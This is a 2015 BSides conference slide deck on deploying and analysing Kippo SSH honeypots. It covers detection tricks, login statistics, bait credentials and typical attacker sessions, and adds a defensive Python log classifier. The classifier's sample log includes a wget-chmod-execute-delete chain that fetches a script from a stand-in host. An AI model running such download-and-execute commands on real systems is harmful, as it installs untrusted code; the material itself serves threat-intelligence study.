Honey Potz - BSides SLC 2015

Post on 16-Jul-2015


Honey Potz
Ethan Dodge (chp1n)

Disclaimer

The views expressed herein are solely my views and not the views of my employer, or any other organization with which I am associated. I am responsible for the content of this presentation.

Likewise, the research conducted and illustrated herein was performed by me unless otherwise noted.

Audience

• Noobs. Don't be afraid to ask questions!
• Those looking to get into the honey pot/threat intelligence communities.
• Those that already have experience honey potting.

Honey Potz
BEWARE OF ADDICTION

Why Honey Pots?

Threat Intel?


Types of Honey Pots
JUST A MORSEL OF HUNNY

HoneyDrive

Bruteforce.gr

Honey pots: Kippo, Dionaea, Honeyd, Glastopf, Conpot, Thug

Visualization: Kippo-Graph, Honeyd-Viz, DionaeaFR, ELK Stack

Low Interaction vs. High Interaction

High interaction:
• Actual machine
• Complete functionality
• Can exploit whatever is exploitable
• Used to observe targeted attacks
• Not easily detectable
• Bifrozt

Low interaction:
• Simulation
• Incomplete functionality
• Cannot be used to exploit other vulnerabilities
• Used to observe behavior
• Often easily detectable
• Kippo

Kippo
THE GOOD AND THE BAD

“Kippo is a medium interaction SSH honeypot designed to log brute force attacks and, most importantly, the entire shell interaction performed by the attacker.”

https://github.com/desaster/kippo

How Kippo Works

How To Detect Kippo

Simple Ways To “Hide” It

• Change the hostname
• Add a login banner
• Edit userdb.txt
• Change file system
• Edit /etc/passwd & /etc/shadow
• Edit script output

Findings

Login Attempts vs Successes in the past 30 days - LA

Total attempts: 519
Total successes: 10

Total attempts: 3,924
Total successes: 2

Creds

• Default root/123456 (Top Graph)
• Leaked 14 character password (Bottom Graph)

“Leaking” Creds

• Leaked 14 character password to honeypot on pastebin
• Posted at 1:14 AM MST
• Any guesses as to how long it took until someone logged in?

2 Hours 35 Minutes

• First login with the correct password seen at 3:49 MST.
• Romanian IP Address

• Malicious intent
• Pastebin has over 100 views in 2 minutes (Bots)
• Saw 5 logins from 3 distinct IP addresses in 12 hours

Login Attempts vs Successes in the past 30 days - Canada

Total attempts: 255,059
Total successes: 79

Total attempts: 282,263
Total successes: 0

Hosting Problems

You get what you pay for. (Cloud At Cost)

Changed userdb.txt

• Rejects most common 100 passwords from the most common 10 usernames (Top Graph)
• Therefore accepting multiple passwords
• Accepts 7 character password from 5 different usernames
• Yet to be cracked
• Leaked in a key logger dump this morning at 7:53 MST

Changed fs.pickle

• Spun up an Ubuntu box serving DNS
• Used createfs.py to create new fs.pickle
• Yet to see better results
• I will blog about it

Login Attempts vs Successes in the past 30 days - Europe

Total attempts: 429,661
Total successes: 0

Most attacked box

• In the heart of the EU
• Doesn’t get attacked as much as Asian honeypots
• 8 character password
• Logon banner in Spanish

Typical malicious session

• Wget/curl some script or executable
• Chmod it
• Execute it
• Delete it
• 99% of the time it is scripted

Occasionally you’ll get a lot more commands.

Typical Detection

• Runs ps –a, ifconfig, or cats a standard file
• Sees default Kippo content
• Hops out
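As an added example (not from the talk, and not Kippo's own code), a small Python script that works the two patterns above out of a constructed, simplified JSON session log: it reports login attempts vs successes per box, as on the Findings slides, and labels each session either as the scripted download/chmod/execute/delete chain or as a fingerprinting probe that hops out. The field names session/src_ip/event/input are an assumption, not the fork's real JSON schema.

```python
import json
from collections import defaultdict

# Constructed Kippo-style JSON log (not real Kippo output; field names are an assumption).
SAMPLE_LOG = """\
{"session": "s1", "src_ip": "203.0.113.5", "event": "login.failed", "username": "root", "password": "123456"}
{"session": "s1", "src_ip": "203.0.113.5", "event": "login.success", "username": "root", "password": "hunter2hunter2"}
{"session": "s1", "src_ip": "203.0.113.5", "event": "command", "input": "wget http://198.51.100.7/x.sh -O /tmp/x.sh"}
{"session": "s1", "src_ip": "203.0.113.5", "event": "command", "input": "chmod +x /tmp/x.sh"}
{"session": "s1", "src_ip": "203.0.113.5", "event": "command", "input": "/tmp/x.sh"}
{"session": "s1", "src_ip": "203.0.113.5", "event": "command", "input": "rm -f /tmp/x.sh"}
{"session": "s3", "src_ip": "192.0.2.44", "event": "login.success", "username": "root", "password": "hunter2hunter2"}
{"session": "s3", "src_ip": "192.0.2.44", "event": "command", "input": "ps -a"}
{"session": "s3", "src_ip": "192.0.2.44", "event": "command", "input": "cat /proc/cpuinfo"}
"""

def parse_events(text):
    return [json.loads(line) for line in text.splitlines() if line.strip()]

def login_stats(events):
    # Attempts vs successes: the per-box numbers reported on the Findings slides.
    attempts = sum(1 for e in events if e["event"].startswith("login."))
    successes = sum(1 for e in events if e["event"] == "login.success")
    return attempts, successes

# The four stages of the typical scripted session, matched in order.
STAGES = (
    lambda c: c.startswith(("wget ", "curl ")),               # wget/curl a script or executable
    lambda c: c.startswith("chmod "),                         # chmod it
    lambda c: c.startswith(("./", "/tmp/", "sh ", "bash ")),  # execute it
    lambda c: c.startswith("rm "),                            # delete it
)
# Commands a visitor runs to fingerprint the box (ps, ifconfig, cat of a standard file).
PROBES = ("ps", "ifconfig", "cat /etc/", "cat /proc/")

def classify_session(commands):
    stage = 0
    for cmd in commands:
        if stage < len(STAGES) and STAGES[stage](cmd):
            stage += 1
    if stage == len(STAGES):
        return "scripted"
    if commands and all(cmd.startswith(PROBES) for cmd in commands):
        return "probe"
    return "other"

def classify_all(events):
    by_session = defaultdict(list)
    for e in events:
        if e["event"] == "command":
            by_session[e["session"]].append(e["input"].strip())
    return {s: classify_session(c) for s, c in by_session.items()}
```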

Kippo Visualization
THE OLD AND THE NEW

Kippo-Graph


Tango Honeypot Intelligence

@Brian_Warehime

Demo Time

Downloads

• Original Kippo: https://github.com/desaster/kippo
• Kippo fork I use: https://github.com/micheloosterhof/kippo
  • Supports SFTP and json logging
  • Is updated regularly
• Download Tango: https://apps.splunk.com/app/2666/
• Download Honeydrive: http://sourceforge.net/projects/honeydrive/

Hosting Links

• Crissic – crissic.net ($10/year): LA and Florida
• Cloud At Cost – cloudatcost.com ($35/life): Canada
• Time4VPS – Time4VPS (€10/year): European Union
• Lowendstock.com
• Lowendtalk.com

@Andrew__Morris

@Brian_Warehime

@micheloosterhof

@da_667

@Threat_Inc

Contact

Freenode: chp1n
Twitter: @chp1n
Blog: utzpin.org

el fin.